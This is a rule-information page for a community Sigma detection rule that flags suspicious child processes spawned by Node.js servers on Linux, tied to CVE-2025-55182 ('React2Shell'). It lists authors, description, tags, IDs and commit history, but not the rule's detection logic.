Linux Suspicious Child Process from Node.js - React2Shell

Rule Info

Name
Linux Suspicious Child Process from Node.js - React2Shell
Author
Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
Description
Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell). This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands. When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>). For other methods, the Image field will show the spawned process directly.
Reference
https://github.com/msanft/CVE-2025-55182
Date
2025-12-05 00:00:00
Modified
None
Id
c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7
Tags
attack.execution attack.t1059 attack.initial-access attack.t1190 detection.emerging-threats cve.2025-55182
Type
Community Rule
Link to Public Repo
https://github.com/SigmaHQ/sigma/search?q=c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7

Rule History

Author
Title
Date
Commit
Swachchhanda Shrawan Poudel
Merge PR #5795 from @swachchhanda000 - Add new rules for CVE-2025-55182 / React2Shell
2025-12-10
13aae8c1e
THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022